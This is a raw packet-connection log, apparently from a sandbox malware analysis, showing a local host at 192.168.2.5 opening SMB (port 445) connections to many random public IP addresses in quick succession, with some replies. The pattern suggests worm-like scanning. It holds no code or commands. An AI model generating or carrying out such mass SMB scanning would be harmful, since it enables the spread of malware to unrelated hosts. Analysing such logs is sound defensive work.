                                                        Dec 22, 2022 10:07:18.171159029 CET57250445192.168.2.5178.26.198.90
                                                        Dec 22, 2022 10:07:18.171436071 CET57252445192.168.2.5162.41.197.47
                                                        Dec 22, 2022 10:07:18.171860933 CET57257445192.168.2.5205.11.101.32
                                                        Dec 22, 2022 10:07:18.173820019 CET57263445192.168.2.5191.67.116.56
                                                        Dec 22, 2022 10:07:18.173841953 CET57262445192.168.2.5160.119.150.151
                                                        Dec 22, 2022 10:07:18.174030066 CET57265445192.168.2.528.136.146.165
                                                        Dec 22, 2022 10:07:18.217560053 CET57268445192.168.2.529.70.164.11
                                                        Dec 22, 2022 10:07:18.218301058 CET57272445192.168.2.5102.41.139.62
                                                        Dec 22, 2022 10:07:18.218602896 CET57273445192.168.2.5201.99.223.138
                                                        Dec 22, 2022 10:07:18.218786001 CET57274445192.168.2.5168.163.151.11
                                                        Dec 22, 2022 10:07:18.219451904 CET57281445192.168.2.515.182.27.43
                                                        Dec 22, 2022 10:07:18.219695091 CET57282445192.168.2.5190.8.124.146
                                                        Dec 22, 2022 10:07:18.219943047 CET57283445192.168.2.523.14.151.178
                                                        Dec 22, 2022 10:07:18.220666885 CET57288445192.168.2.573.157.149.135
                                                        Dec 22, 2022 10:07:18.221002102 CET57294445192.168.2.56.121.251.164
                                                        Dec 22, 2022 10:07:18.222803116 CET57295445192.168.2.5179.134.162.30
                                                        Dec 22, 2022 10:07:18.223040104 CET57296445192.168.2.523.15.165.29
                                                        Dec 22, 2022 10:07:18.223170042 CET57298445192.168.2.569.51.242.215
                                                        Dec 22, 2022 10:07:18.223258018 CET57297445192.168.2.5170.89.230.136
                                                        Dec 22, 2022 10:07:18.223335028 CET57299445192.168.2.586.77.137.202
                                                        Dec 22, 2022 10:07:18.280138016 CET44557272102.41.139.62192.168.2.5
                                                        Dec 22, 2022 10:07:18.478533030 CET44557282190.8.124.146192.168.2.5
                                                        Dec 22, 2022 10:07:18.809994936 CET57272445192.168.2.5102.41.139.62
                                                        Dec 22, 2022 10:07:18.871390104 CET44557272102.41.139.62192.168.2.5
                                                        Dec 22, 2022 10:07:18.982000113 CET57282445192.168.2.5190.8.124.146
                                                        Dec 22, 2022 10:07:19.045419931 CET57318445192.168.2.541.203.13.120
                                                        Dec 22, 2022 10:07:19.091314077 CET56971445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:19.185513973 CET57323445192.168.2.588.218.188.38
                                                        Dec 22, 2022 10:07:19.231501102 CET4455732388.218.188.38192.168.2.5
                                                        Dec 22, 2022 10:07:19.240956068 CET44557282190.8.124.146192.168.2.5
                                                        Dec 22, 2022 10:07:19.263257027 CET56623445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:19.279247999 CET57326445192.168.2.5177.4.197.171
                                                        Dec 22, 2022 10:07:19.279364109 CET57325445192.168.2.5222.99.169.233
                                                        Dec 22, 2022 10:07:19.279398918 CET57327445192.168.2.5166.203.248.199
                                                        Dec 22, 2022 10:07:19.279428005 CET57328445192.168.2.531.25.203.156
                                                        Dec 22, 2022 10:07:19.279540062 CET57329445192.168.2.520.21.147.103
                                                        Dec 22, 2022 10:07:19.280215025 CET57338445192.168.2.51.169.177.127
                                                        Dec 22, 2022 10:07:19.280215979 CET57344445192.168.2.5201.2.228.25
                                                        Dec 22, 2022 10:07:19.280369997 CET57337445192.168.2.5177.175.103.217
                                                        Dec 22, 2022 10:07:19.280533075 CET57349445192.168.2.544.171.159.76
                                                        Dec 22, 2022 10:07:19.280572891 CET57350445192.168.2.5194.95.17.70
                                                        Dec 22, 2022 10:07:19.280638933 CET57351445192.168.2.594.228.84.187
                                                        Dec 22, 2022 10:07:19.326040983 CET57355445192.168.2.5211.90.33.180
                                                        Dec 22, 2022 10:07:19.326344967 CET57359445192.168.2.5215.40.190.253
                                                        Dec 22, 2022 10:07:19.326441050 CET57360445192.168.2.5110.207.196.94
                                                        Dec 22, 2022 10:07:19.326481104 CET57361445192.168.2.562.34.183.178
                                                        Dec 22, 2022 10:07:19.326952934 CET57369445192.168.2.5136.204.60.44
                                                        Dec 22, 2022 10:07:19.327075958 CET57370445192.168.2.5178.44.231.50
                                                        Dec 22, 2022 10:07:19.327405930 CET57376445192.168.2.5215.72.141.114
                                                        Dec 22, 2022 10:07:19.327442884 CET57368445192.168.2.587.30.129.62
                                                        Dec 22, 2022 10:07:19.329435110 CET57382445192.168.2.54.21.234.57
                                                        Dec 22, 2022 10:07:19.329618931 CET57384445192.168.2.578.235.205.51
                                                        Dec 22, 2022 10:07:19.329716921 CET57386445192.168.2.538.168.53.78
                                                        Dec 22, 2022 10:07:19.329751968 CET57385445192.168.2.550.226.7.184
                                                        Dec 22, 2022 10:07:19.329761028 CET57383445192.168.2.556.135.14.76
                                                        Dec 22, 2022 10:07:19.538768053 CET445573381.169.177.127192.168.2.5
                                                        Dec 22, 2022 10:07:19.747637987 CET57323445192.168.2.588.218.188.38
                                                        Dec 22, 2022 10:07:19.794060946 CET4455732388.218.188.38192.168.2.5
                                                        Dec 22, 2022 10:07:19.891928911 CET44556970142.219.19.4192.168.2.5
                                                        Dec 22, 2022 10:07:19.891983986 CET44556970142.219.19.4192.168.2.5
                                                        Dec 22, 2022 10:07:19.892004967 CET44556970142.219.19.4192.168.2.5
                                                        Dec 22, 2022 10:07:20.044555902 CET57338445192.168.2.51.169.177.127
                                                        Dec 22, 2022 10:07:20.082549095 CET44556971142.219.19.4192.168.2.5
                                                        Dec 22, 2022 10:07:20.082592010 CET44556971142.219.19.4192.168.2.5
                                                        Dec 22, 2022 10:07:20.082613945 CET44556971142.219.19.4192.168.2.5
                                                        Dec 22, 2022 10:07:20.107671976 CET57405445192.168.2.541.203.13.121
                                                        Dec 22, 2022 10:07:20.279881954 CET57406445192.168.2.588.218.188.39
                                                        Dec 22, 2022 10:07:20.303694010 CET445573381.169.177.127192.168.2.5
                                                        Dec 22, 2022 10:07:20.326088905 CET4455740688.218.188.39192.168.2.5
                                                        Dec 22, 2022 10:07:20.404500961 CET57415445192.168.2.517.155.207.157
                                                        Dec 22, 2022 10:07:20.404575109 CET57416445192.168.2.598.101.140.247
                                                        Dec 22, 2022 10:07:20.404922962 CET57417445192.168.2.5138.64.140.60
                                                        Dec 22, 2022 10:07:20.405018091 CET57420445192.168.2.5180.188.55.228
                                                        Dec 22, 2022 10:07:20.405381918 CET57427445192.168.2.5201.173.81.200
                                                        Dec 22, 2022 10:07:20.405545950 CET57429445192.168.2.5120.181.245.205
                                                        Dec 22, 2022 10:07:20.405920982 CET57436445192.168.2.511.239.119.104
                                                        Dec 22, 2022 10:07:20.406063080 CET57438445192.168.2.5108.122.16.69
                                                        Dec 22, 2022 10:07:20.406173944 CET57439445192.168.2.576.105.223.211
                                                        Dec 22, 2022 10:07:20.406434059 CET57441445192.168.2.5132.202.117.22
                                                        Dec 22, 2022 10:07:20.406447887 CET57440445192.168.2.520.153.136.100
                                                        Dec 22, 2022 10:07:20.451591969 CET57443445192.168.2.5104.32.157.188
                                                        Dec 22, 2022 10:07:20.452270985 CET57447445192.168.2.589.127.182.163
                                                        Dec 22, 2022 10:07:20.452544928 CET57448445192.168.2.5137.125.81.59
                                                        Dec 22, 2022 10:07:20.452718019 CET57449445192.168.2.5210.161.181.58
                                                        Dec 22, 2022 10:07:20.453854084 CET57456445192.168.2.5110.230.101.0
                                                        Dec 22, 2022 10:07:20.454001904 CET57457445192.168.2.5152.10.54.115
                                                        Dec 22, 2022 10:07:20.454140902 CET57458445192.168.2.5180.113.62.241
                                                        Dec 22, 2022 10:07:20.455092907 CET57464445192.168.2.5194.233.130.238
                                                        Dec 22, 2022 10:07:20.455929995 CET57469445192.168.2.5130.84.192.172
                                                        Dec 22, 2022 10:07:20.457104921 CET57470445192.168.2.519.34.30.57
                                                        Dec 22, 2022 10:07:20.458170891 CET57471445192.168.2.55.202.250.38
                                                        Dec 22, 2022 10:07:20.458914042 CET57472445192.168.2.5197.117.48.106
                                                        Dec 22, 2022 10:07:20.459641933 CET57473445192.168.2.5188.19.75.203
                                                        Dec 22, 2022 10:07:20.460304976 CET57474445192.168.2.5195.107.233.151
                                                        Dec 22, 2022 10:07:20.607606888 CET57477445192.168.2.538.35.118.18
                                                        Dec 22, 2022 10:07:20.779139042 CET4455747738.35.118.18192.168.2.5
                                                        Dec 22, 2022 10:07:20.779304028 CET57477445192.168.2.538.35.118.18
                                                        Dec 22, 2022 10:07:20.779345989 CET57477445192.168.2.538.35.118.18
                                                        Dec 22, 2022 10:07:20.841432095 CET57406445192.168.2.588.218.188.39
                                                        Dec 22, 2022 10:07:20.887201071 CET4455740688.218.188.39192.168.2.5
                                                        Dec 22, 2022 10:07:20.950879097 CET4455747738.35.118.18192.168.2.5
                                                        Dec 22, 2022 10:07:20.951009035 CET57477445192.168.2.538.35.118.18
                                                        Dec 22, 2022 10:07:21.122536898 CET4455747738.35.118.18192.168.2.5
                                                        Dec 22, 2022 10:07:21.122667074 CET57477445192.168.2.538.35.118.18
                                                        Dec 22, 2022 10:07:21.185631037 CET57494445192.168.2.541.203.13.122
                                                        Dec 22, 2022 10:07:21.216468096 CET56377445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:21.293982983 CET4455747738.35.118.18192.168.2.5
                                                        Dec 22, 2022 10:07:21.357896090 CET57495445192.168.2.588.218.188.40
                                                        Dec 22, 2022 10:07:21.358632088 CET57496445192.168.2.538.35.118.19
                                                        Dec 22, 2022 10:07:21.379770994 CET4455749441.203.13.122192.168.2.5
                                                        Dec 22, 2022 10:07:21.379890919 CET57494445192.168.2.541.203.13.122
                                                        Dec 22, 2022 10:07:21.380093098 CET57494445192.168.2.541.203.13.122
                                                        Dec 22, 2022 10:07:21.383210897 CET57497445192.168.2.541.203.13.122
                                                        Dec 22, 2022 10:07:21.403373003 CET4455749588.218.188.40192.168.2.5
                                                        Dec 22, 2022 10:07:21.435291052 CET56382445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:21.529824972 CET4455749638.35.118.19192.168.2.5
                                                        Dec 22, 2022 10:07:21.529989004 CET57496445192.168.2.538.35.118.19
                                                        Dec 22, 2022 10:07:21.530445099 CET57496445192.168.2.538.35.118.19
                                                        Dec 22, 2022 10:07:21.534444094 CET57506445192.168.2.5202.26.159.62
                                                        Dec 22, 2022 10:07:21.534626961 CET57507445192.168.2.598.142.192.204
                                                        Dec 22, 2022 10:07:21.534710884 CET57508445192.168.2.5172.65.99.13
                                                        Dec 22, 2022 10:07:21.534940004 CET57511445192.168.2.5184.193.175.227
                                                        Dec 22, 2022 10:07:21.535228968 CET57518445192.168.2.5217.48.55.173
                                                        Dec 22, 2022 10:07:21.535343885 CET57520445192.168.2.530.220.53.130
                                                        Dec 22, 2022 10:07:21.535640955 CET57526445192.168.2.584.0.46.107
                                                        Dec 22, 2022 10:07:21.535737038 CET57529445192.168.2.5205.27.215.211
                                                        Dec 22, 2022 10:07:21.535896063 CET57530445192.168.2.561.226.67.172
                                                        Dec 22, 2022 10:07:21.535917044 CET57531445192.168.2.529.196.94.119
                                                        Dec 22, 2022 10:07:21.536101103 CET57532445192.168.2.5221.233.207.32
                                                        Dec 22, 2022 10:07:21.537394047 CET57533445192.168.2.538.35.118.19
                                                        Dec 22, 2022 10:07:21.552066088 CET44557508172.65.99.13192.168.2.5
                                                        Dec 22, 2022 10:07:21.552227020 CET57508445192.168.2.5172.65.99.13
                                                        Dec 22, 2022 10:07:21.552392006 CET57508445192.168.2.5172.65.99.13
                                                        Dec 22, 2022 10:07:21.552664995 CET57534445192.168.2.5172.65.99.1
                                                        Dec 22, 2022 10:07:21.569757938 CET44557508172.65.99.13192.168.2.5
                                                        Dec 22, 2022 10:07:21.569842100 CET44557534172.65.99.1192.168.2.5
                                                        Dec 22, 2022 10:07:21.569930077 CET57534445192.168.2.5172.65.99.1
                                                        Dec 22, 2022 10:07:21.570111036 CET44557508172.65.99.13192.168.2.5
                                                        Dec 22, 2022 10:07:21.570200920 CET57534445192.168.2.5172.65.99.1
                                                        Dec 22, 2022 10:07:21.571806908 CET57535445192.168.2.5172.65.99.1
                                                        Dec 22, 2022 10:07:21.572884083 CET4455749741.203.13.122192.168.2.5
                                                        Dec 22, 2022 10:07:21.572956085 CET57497445192.168.2.541.203.13.122
                                                        Dec 22, 2022 10:07:21.572989941 CET57497445192.168.2.541.203.13.122
                                                        Dec 22, 2022 10:07:21.573499918 CET4455749441.203.13.122192.168.2.5
                                                        Dec 22, 2022 10:07:21.573554993 CET4455749441.203.13.122192.168.2.5
                                                        Dec 22, 2022 10:07:21.576680899 CET57536445192.168.2.523.242.61.157
                                                        Dec 22, 2022 10:07:21.577436924 CET57537445192.168.2.5126.13.192.16
                                                        Dec 22, 2022 10:07:21.578128099 CET57538445192.168.2.5157.69.222.239
                                                        Dec 22, 2022 10:07:21.578650951 CET57539445192.168.2.5170.68.252.78
                                                        Dec 22, 2022 10:07:21.579253912 CET57540445192.168.2.596.48.215.15
                                                        Dec 22, 2022 10:07:21.579407930 CET57541445192.168.2.547.235.70.132
                                                        Dec 22, 2022 10:07:21.579818010 CET57546445192.168.2.538.50.202.23
                                                        Dec 22, 2022 10:07:21.580471039 CET57552445192.168.2.5133.146.157.151
                                                        Dec 22, 2022 10:07:21.580566883 CET57553445192.168.2.551.8.15.141
                                                        Dec 22, 2022 10:07:21.580648899 CET57554445192.168.2.5129.119.124.43
                                                        Dec 22, 2022 10:07:21.581254959 CET57561445192.168.2.5133.20.61.236
                                                        Dec 22, 2022 10:07:21.581428051 CET57562445192.168.2.574.98.168.20
                                                        Dec 22, 2022 10:07:21.581523895 CET57563445192.168.2.5154.166.164.126
                                                        Dec 22, 2022 10:07:21.581903934 CET57567445192.168.2.5207.97.225.202
                                                        Dec 22, 2022 10:07:21.589195013 CET44557534172.65.99.1192.168.2.5
                                                        Dec 22, 2022 10:07:21.589231968 CET44557534172.65.99.1192.168.2.5
                                                        Dec 22, 2022 10:07:21.590233088 CET44557535172.65.99.1192.168.2.5
                                                        Dec 22, 2022 10:07:21.590320110 CET57535445192.168.2.5172.65.99.1
                                                        Dec 22, 2022 10:07:21.590370893 CET57535445192.168.2.5172.65.99.1
                                                        Dec 22, 2022 10:07:21.607731104 CET44557535172.65.99.1192.168.2.5
                                                        Dec 22, 2022 10:07:21.608891964 CET44557535172.65.99.1192.168.2.5
                                                        Dec 22, 2022 10:07:21.677406073 CET44556887149.248.216.3192.168.2.5
                                                        Dec 22, 2022 10:07:21.701867104 CET4455749638.35.118.19192.168.2.5
                                                        Dec 22, 2022 10:07:21.701898098 CET4455749638.35.118.19192.168.2.5
                                                        Dec 22, 2022 10:07:21.711719036 CET4455753338.35.118.19192.168.2.5
                                                        Dec 22, 2022 10:07:21.711854935 CET57533445192.168.2.538.35.118.19
                                                        Dec 22, 2022 10:07:21.711920977 CET57533445192.168.2.538.35.118.19
                                                        Dec 22, 2022 10:07:21.732542992 CET57572445192.168.2.5149.248.216.4
                                                        Dec 22, 2022 10:07:21.758980036 CET44557572149.248.216.4192.168.2.5
                                                        Dec 22, 2022 10:07:21.759094954 CET57572445192.168.2.5149.248.216.4
                                                        Dec 22, 2022 10:07:21.759156942 CET57572445192.168.2.5149.248.216.4
                                                        Dec 22, 2022 10:07:21.759737015 CET57573445192.168.2.5149.248.216.4
                                                        Dec 22, 2022 10:07:21.762741089 CET4455749741.203.13.122192.168.2.5
                                                        Dec 22, 2022 10:07:21.786206007 CET44557573149.248.216.4192.168.2.5
                                                        Dec 22, 2022 10:07:21.786242008 CET44557572149.248.216.4192.168.2.5
                                                        Dec 22, 2022 10:07:21.786314964 CET57573445192.168.2.5149.248.216.4
                                                        Dec 22, 2022 10:07:21.786360979 CET57573445192.168.2.5149.248.216.4
                                                        Dec 22, 2022 10:07:21.812808990 CET44557573149.248.216.4192.168.2.5
                                                        Dec 22, 2022 10:07:21.863771915 CET44557537126.13.192.16192.168.2.5
                                                        Dec 22, 2022 10:07:21.886584044 CET4455753338.35.118.19192.168.2.5
                                                        Dec 22, 2022 10:07:21.886850119 CET57533445192.168.2.538.35.118.19
                                                        Dec 22, 2022 10:07:21.904074907 CET57495445192.168.2.588.218.188.40
                                                        Dec 22, 2022 10:07:21.949489117 CET4455749588.218.188.40192.168.2.5
                                                        Dec 22, 2022 10:07:21.982201099 CET56627445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:22.061610937 CET4455753338.35.118.19192.168.2.5
                                                        Dec 22, 2022 10:07:22.061754942 CET57533445192.168.2.538.35.118.19
                                                        Dec 22, 2022 10:07:22.236505985 CET4455753338.35.118.19192.168.2.5
                                                        Dec 22, 2022 10:07:22.372903109 CET57537445192.168.2.5126.13.192.16
                                                        Dec 22, 2022 10:07:22.436000109 CET57590445192.168.2.588.218.188.41
                                                        Dec 22, 2022 10:07:22.654716969 CET57599445192.168.2.5185.180.142.56
                                                        Dec 22, 2022 10:07:22.654864073 CET57600445192.168.2.517.172.115.17
                                                        Dec 22, 2022 10:07:22.655312061 CET57604445192.168.2.5113.190.54.186
                                                        Dec 22, 2022 10:07:22.655786037 CET57610445192.168.2.5152.100.15.154
                                                        Dec 22, 2022 10:07:22.656016111 CET57612445192.168.2.5135.24.180.225
                                                        Dec 22, 2022 10:07:22.656572104 CET57619445192.168.2.5152.139.105.160
                                                        Dec 22, 2022 10:07:22.656753063 CET57620445192.168.2.516.33.114.94
                                                        Dec 22, 2022 10:07:22.656964064 CET57622445192.168.2.59.5.123.173
                                                        Dec 22, 2022 10:07:22.657068968 CET57623445192.168.2.5111.176.208.134
                                                        Dec 22, 2022 10:07:22.657191992 CET57624445192.168.2.5112.122.75.226
                                                        Dec 22, 2022 10:07:22.659419060 CET44557537126.13.192.16192.168.2.5
                                                        Dec 22, 2022 10:07:22.686731100 CET57625445192.168.2.597.117.114.8
                                                        Dec 22, 2022 10:07:22.687300920 CET57626445192.168.2.522.192.81.245
                                                        Dec 22, 2022 10:07:22.687974930 CET57627445192.168.2.5146.209.166.237
                                                        Dec 22, 2022 10:07:22.688137054 CET57628445192.168.2.532.142.167.50
                                                        Dec 22, 2022 10:07:22.688563108 CET57633445192.168.2.555.114.114.61
                                                        Dec 22, 2022 10:07:22.689184904 CET57639445192.168.2.5190.231.128.213
                                                        Dec 22, 2022 10:07:22.689310074 CET57640445192.168.2.5111.17.154.228
                                                        Dec 22, 2022 10:07:22.689445019 CET57641445192.168.2.53.148.234.2
                                                        Dec 22, 2022 10:07:22.690042973 CET57648445192.168.2.558.79.171.252
                                                        Dec 22, 2022 10:07:22.690155029 CET57649445192.168.2.554.88.239.155
                                                        Dec 22, 2022 10:07:22.690325022 CET57650445192.168.2.5204.31.212.211
                                                        Dec 22, 2022 10:07:22.690711021 CET57654445192.168.2.529.176.70.15
                                                        Dec 22, 2022 10:07:22.691284895 CET57656445192.168.2.577.53.167.94
                                                        Dec 22, 2022 10:07:22.691800117 CET57657445192.168.2.5150.248.96.207
                                                        Dec 22, 2022 10:07:23.091903925 CET57666445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:23.257901907 CET44557666142.219.19.4192.168.2.5
                                                        Dec 22, 2022 10:07:23.258021116 CET57666445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:23.258094072 CET57666445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:23.499324083 CET57678445192.168.2.588.218.188.42
                                                        Dec 22, 2022 10:07:23.701114893 CET57666445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:23.801676035 CET57690445192.168.2.5168.69.141.18
                                                        Dec 22, 2022 10:07:23.801676035 CET57692445192.168.2.5159.219.93.54
                                                        Dec 22, 2022 10:07:23.802618980 CET57698445192.168.2.536.40.140.253
                                                        Dec 22, 2022 10:07:23.802913904 CET57701445192.168.2.594.253.215.158
                                                        Dec 22, 2022 10:07:23.803178072 CET57703445192.168.2.568.12.105.205
                                                        Dec 22, 2022 10:07:23.803178072 CET57702445192.168.2.556.31.105.186
                                                        Dec 22, 2022 10:07:23.803272963 CET57704445192.168.2.5214.175.188.95
                                                        Dec 22, 2022 10:07:23.803319931 CET57705445192.168.2.5157.73.17.149
                                                        Dec 22, 2022 10:07:23.803565025 CET57708445192.168.2.589.233.253.231
                                                        Dec 22, 2022 10:07:23.803653002 CET57710445192.168.2.5122.205.34.9
                                                        Dec 22, 2022 10:07:23.803841114 CET57714445192.168.2.5115.153.95.24
                                                        Dec 22, 2022 10:07:23.803963900 CET57716445192.168.2.515.114.12.117
                                                        Dec 22, 2022 10:07:23.803963900 CET57717445192.168.2.5220.8.49.187
                                                        Dec 22, 2022 10:07:23.803975105 CET57715445192.168.2.581.113.9.182
                                                        Dec 22, 2022 10:07:23.804824114 CET57721445192.168.2.5114.201.124.96
                                                        Dec 22, 2022 10:07:23.804837942 CET57722445192.168.2.5201.249.3.101
                                                        Dec 22, 2022 10:07:23.811606884 CET57723445192.168.2.5112.169.179.62
                                                        Dec 22, 2022 10:07:23.812242985 CET57725445192.168.2.5174.44.132.81
                                                        Dec 22, 2022 10:07:23.812563896 CET57730445192.168.2.565.78.5.110
                                                        Dec 22, 2022 10:07:23.812814951 CET57736445192.168.2.560.42.205.254
                                                        Dec 22, 2022 10:07:23.812865019 CET57737445192.168.2.5144.10.130.135
                                                        Dec 22, 2022 10:07:23.812946081 CET57738445192.168.2.5132.78.67.246
                                                        Dec 22, 2022 10:07:23.813502073 CET57724445192.168.2.5216.62.171.243
                                                        Dec 22, 2022 10:07:23.813918114 CET57745445192.168.2.573.237.103.61
                                                        Dec 22, 2022 10:07:24.233093977 CET57666445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:24.451431036 CET57763445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:24.560789108 CET57766445192.168.2.588.218.188.43
                                                        Dec 22, 2022 10:07:24.600438118 CET44557763155.100.133.3192.168.2.5
                                                        Dec 22, 2022 10:07:24.600560904 CET57763445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:24.623583078 CET57768445192.168.2.5172.65.99.1
                                                        Dec 22, 2022 10:07:24.641130924 CET44557768172.65.99.1192.168.2.5
                                                        Dec 22, 2022 10:07:24.641259909 CET57768445192.168.2.5172.65.99.1
                                                        Dec 22, 2022 10:07:24.641303062 CET57768445192.168.2.5172.65.99.1
                                                        Dec 22, 2022 10:07:24.658759117 CET44557768172.65.99.1192.168.2.5
                                                        Dec 22, 2022 10:07:24.659204006 CET44557768172.65.99.1192.168.2.5
                                                        Dec 22, 2022 10:07:24.717259884 CET57769445192.168.2.5172.65.99.2
                                                        Dec 22, 2022 10:07:24.734797001 CET44557769172.65.99.2192.168.2.5
                                                        Dec 22, 2022 10:07:24.734886885 CET57769445192.168.2.5172.65.99.2
                                                        Dec 22, 2022 10:07:24.735042095 CET57769445192.168.2.5172.65.99.2
                                                        Dec 22, 2022 10:07:24.735820055 CET57770445192.168.2.5172.65.99.2
                                                        Dec 22, 2022 10:07:24.753248930 CET44557770172.65.99.2192.168.2.5
                                                        Dec 22, 2022 10:07:24.753523111 CET57770445192.168.2.5172.65.99.2
                                                        Dec 22, 2022 10:07:24.753566980 CET57770445192.168.2.5172.65.99.2
                                                        Dec 22, 2022 10:07:24.753602982 CET44557769172.65.99.2192.168.2.5
                                                        Dec 22, 2022 10:07:24.764420033 CET57771445192.168.2.541.203.13.122
                                                        Dec 22, 2022 10:07:24.771013975 CET44557770172.65.99.2192.168.2.5
                                                        Dec 22, 2022 10:07:24.771634102 CET44557770172.65.99.2192.168.2.5
                                                        Dec 22, 2022 10:07:24.904872894 CET57779445192.168.2.5112.91.38.26
                                                        Dec 22, 2022 10:07:24.905309916 CET57785445192.168.2.5207.86.236.65
                                                        Dec 22, 2022 10:07:24.905494928 CET57787445192.168.2.5138.46.187.233
                                                        Dec 22, 2022 10:07:24.905632973 CET57789445192.168.2.599.15.64.84
                                                        Dec 22, 2022 10:07:24.905710936 CET57790445192.168.2.525.217.235.199
                                                        Dec 22, 2022 10:07:24.905766010 CET57791445192.168.2.572.47.58.46
                                                        Dec 22, 2022 10:07:24.905917883 CET57793445192.168.2.5126.137.74.179
                                                        Dec 22, 2022 10:07:24.906141996 CET57797445192.168.2.52.130.241.207
                                                        Dec 22, 2022 10:07:24.906214952 CET57796445192.168.2.5174.240.175.72
                                                        Dec 22, 2022 10:07:24.906485081 CET57800445192.168.2.5103.232.194.90
                                                        Dec 22, 2022 10:07:24.906622887 CET57802445192.168.2.527.175.152.67
                                                        Dec 22, 2022 10:07:24.906713963 CET57803445192.168.2.5169.159.163.61
                                                        Dec 22, 2022 10:07:24.906786919 CET57804445192.168.2.536.227.151.134
                                                        Dec 22, 2022 10:07:24.907597065 CET57813445192.168.2.5117.46.226.235
                                                        Dec 22, 2022 10:07:24.908035994 CET57814445192.168.2.5120.37.113.69
                                                        Dec 22, 2022 10:07:24.908515930 CET57815445192.168.2.533.85.213.8
                                                        Dec 22, 2022 10:07:24.921489954 CET57816445192.168.2.5176.232.97.215
                                                        Dec 22, 2022 10:07:24.922389030 CET57817445192.168.2.5175.175.196.101
                                                        Dec 22, 2022 10:07:24.924011946 CET57824445192.168.2.5110.138.127.36
                                                        Dec 22, 2022 10:07:24.924278975 CET57825445192.168.2.592.170.216.19
                                                        Dec 22, 2022 10:07:24.924581051 CET57826445192.168.2.5216.6.136.53
                                                        Dec 22, 2022 10:07:24.925102949 CET57831445192.168.2.533.10.219.154
                                                        Dec 22, 2022 10:07:24.925484896 CET57837445192.168.2.572.63.47.119
                                                        Dec 22, 2022 10:07:24.926635027 CET57838445192.168.2.551.123.10.26
                                                        Dec 22, 2022 10:07:24.949882984 CET4455777141.203.13.122192.168.2.5
                                                        Dec 22, 2022 10:07:24.950050116 CET57771445192.168.2.541.203.13.122
                                                        Dec 22, 2022 10:07:24.950103998 CET57771445192.168.2.541.203.13.122
                                                        Dec 22, 2022 10:07:25.029337883 CET57763445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:25.136107922 CET4455777141.203.13.122192.168.2.5
                                                        Dec 22, 2022 10:07:25.204689980 CET57844445192.168.2.541.203.13.123
                                                        Dec 22, 2022 10:07:25.216816902 CET57666445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:25.248725891 CET57846445192.168.2.538.35.118.19
                                                        Dec 22, 2022 10:07:25.420212984 CET4455784638.35.118.19192.168.2.5
                                                        Dec 22, 2022 10:07:25.420892954 CET57846445192.168.2.538.35.118.19
                                                        Dec 22, 2022 10:07:25.421046972 CET57846445192.168.2.538.35.118.19
                                                        Dec 22, 2022 10:07:25.451296091 CET57763445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:25.592761993 CET4455784638.35.118.19192.168.2.5
                                                        Dec 22, 2022 10:07:25.595663071 CET57846445192.168.2.538.35.118.19
                                                        Dec 22, 2022 10:07:25.624557972 CET57858445192.168.2.588.218.188.44
                                                        Dec 22, 2022 10:07:25.713491917 CET57862443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:07:25.713540077 CET4435786220.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:07:25.713670969 CET57862443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:07:25.714960098 CET57862443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:07:25.714994907 CET4435786220.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:07:25.767608881 CET4455784638.35.118.19192.168.2.5
                                                        Dec 22, 2022 10:07:25.776498079 CET57846445192.168.2.538.35.118.19
                                                        Dec 22, 2022 10:07:25.817173958 CET4435786220.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:07:25.817331076 CET57862443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:07:25.820698977 CET57862443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:07:25.820724010 CET4435786220.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:07:25.821039915 CET4435786220.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:07:25.822431087 CET57862443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:07:25.822463989 CET4435786220.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:07:25.822485924 CET57862443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:07:25.822495937 CET4435786220.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:07:25.822856903 CET57862443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:07:25.822870970 CET4435786220.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:07:25.852756977 CET4435786220.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:07:25.852859020 CET4435786220.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:07:25.853092909 CET57862443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:07:25.853346109 CET57862443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:07:25.853367090 CET4435786220.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:07:25.948080063 CET4455784638.35.118.19192.168.2.5
                                                        Dec 22, 2022 10:07:26.014939070 CET57871445192.168.2.556.108.167.134
                                                        Dec 22, 2022 10:07:26.015671015 CET57876445192.168.2.558.104.225.110
                                                        Dec 22, 2022 10:07:26.015942097 CET57878445192.168.2.5211.42.56.107
                                                        Dec 22, 2022 10:07:26.016190052 CET57880445192.168.2.51.162.31.4
                                                        Dec 22, 2022 10:07:26.016372919 CET57881445192.168.2.529.181.170.183
                                                        Dec 22, 2022 10:07:26.016515017 CET57882445192.168.2.5167.89.105.46
                                                        Dec 22, 2022 10:07:26.016932011 CET57884445192.168.2.521.16.102.114
                                                        Dec 22, 2022 10:07:26.017265081 CET57887445192.168.2.59.94.202.121
